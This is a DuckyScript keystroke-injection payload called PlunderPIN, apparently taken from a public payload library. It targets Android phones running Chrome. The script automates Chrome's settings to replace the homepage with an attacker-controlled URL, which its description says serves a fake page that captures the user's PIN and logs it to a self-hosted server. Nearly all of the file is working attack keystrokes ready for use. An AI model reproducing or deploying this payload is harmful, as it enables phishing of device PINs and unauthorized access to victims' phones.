Path: blob/master/payloads/library/mobile/Android/PlunderPIN/payload.txt
4032 views
REM TITLE: PlunderPIN1REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)2REM TARGET OS: Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V8.0 | Android 16 | Google Chrome 143.0.7499.53)3REM DESCRIPTION: PlunderPIN is a mobile PIN phishing payload that replaces a user's Google Chrome browser homepage with a malicious imitation homepage that creates prompts to capture the user's PIN and log it to a self hosted Apache webserver. See README.md for full description.4REM REQUIREMENTS: See README.md56DEFINE #Apache_URL http://shorturl.at/Place-URL-Here78REM Begin attack:9ATTACKMODE HID10DELAY 10001112REM Opening Google Chrome:13GUI f14DELAY 40015STRINGLN chrome16DELAY 20017TAB18DELAY 20019ENTER20DELAY 5002122REM Opening new tab to ensure proper default Chrome environment to execute payload properly:23CTRL t24DELAY 30025SHIFT TAB26DELAY 20027ENTER28DELAY 3502930REM Navigating to Homepage settings:31REPEAT 8 DOWNARROW32ENTER33DELAY 35034REPEAT 12 DOWNARROW35ENTER3637REM Setting Apache webserver URL as default homepage:38DELAY 25039REPEAT 6 TAB40DELAY 25041CTRL a42DELAY 25043STRINGLN #Apache_URL44DELAY 2504546REM Navigating back to original homepage and closing all tabs:47ESC48DELAY 10049ESC50DELAY 25051SHIFT TAB52DELAY 25053ENTER54DELAY 25055REPEAT 4 TAB56DELAY 25057ENTER58DELAY 25059REPEAT 3 DOWNARROW60DELAY 25061ENTER62DELAY 25063REPEAT 2 TAB64ENTER6566REM Closing applications (including browser) and returning to home screen:67INJECT_MOD68GUI TAB69DELAY 30070REPEAT 2 DOWNARROW71DELAY 15072ENTER737475